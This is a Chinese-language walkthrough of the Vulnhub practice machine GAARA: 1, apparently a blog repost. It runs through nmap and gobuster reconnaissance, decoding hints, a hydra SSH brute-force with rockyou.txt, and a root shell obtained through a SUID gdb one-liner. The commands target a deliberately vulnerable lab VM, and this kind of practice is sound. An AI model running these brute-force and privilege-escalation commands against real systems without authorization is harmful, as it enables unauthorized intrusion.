Vulnhub实战靶场:GAARA: 1

一、环境搭建

1、官网下载连接:https://www.vulnhub.com/entry/gaara-1,629/

2、下载之后,使用Oracle VM VirtualBox导入靶场环境

3、为了正常练习,将靶场的网卡模式设置为桥接模式,启动即可

 二、靶场攻略

1、探测出靶场ip:nmap -sP --min-hostgroup 1024 --min-parallelism 1024  10.10.114.0/24

 2、探测靶场端口、服务寻找突破口:nmap -sS -A 10.10.114.230,启动了80和22端口,突破口肯定在80的web服务中

 访问80端口,首页只有一个图片,没有任何提示信息

 

 3、扫描网站目录:gobuster dir -e -u http://10.10.114.230 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

 访问返回200的http://10.10.114.230/Cryoserver,网页里直接一个非常大的白底页面,拉倒最下边才发现提示

 4、一个个访问提示的目录,最后在/iamGaara目录中,看到一串账号密码:Gaara f1MgN9mTf9SNbzRygcU(PS:眼睛都快看瞎了)

 下一步就是解密,使用的base58的加密方法,得到明文账号密码,gaara:ismyname,尝试用解密的账号密码登录ssh,发现密码是错误的,不过账户名没问题是可以登录的

 5、尝试爆破密码:hydra -l gaara -P /usr/share/wordlists/rockyou.txt -t 30 ssh://10.10.114.230,成功爆破得到密码为:iloveyou2

 再次使用ssh登录,成功登录,得到第一个flag,还有下一个提示

 6、提示为base64加密的内容,是一个目录

 访问提示的目录,查看隐藏文件,发现下一个提示

 使用的Brainfuck加密,解密之后,就是一句嘲讽

 7、还是需要提权,先试试SUID:find / -perm -u=s -type f 2>/dev/null

 参考资料:https://gtfobins.github.io/gtfobins/gdb/,需要python环境,系统中正好有

 利用查到的资料,进入/usr/bin,执行命令:./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit,成功提权

 得到root下的falg

 完

原文地址:https://www.cnblogs.com/sym945/p/14557426.html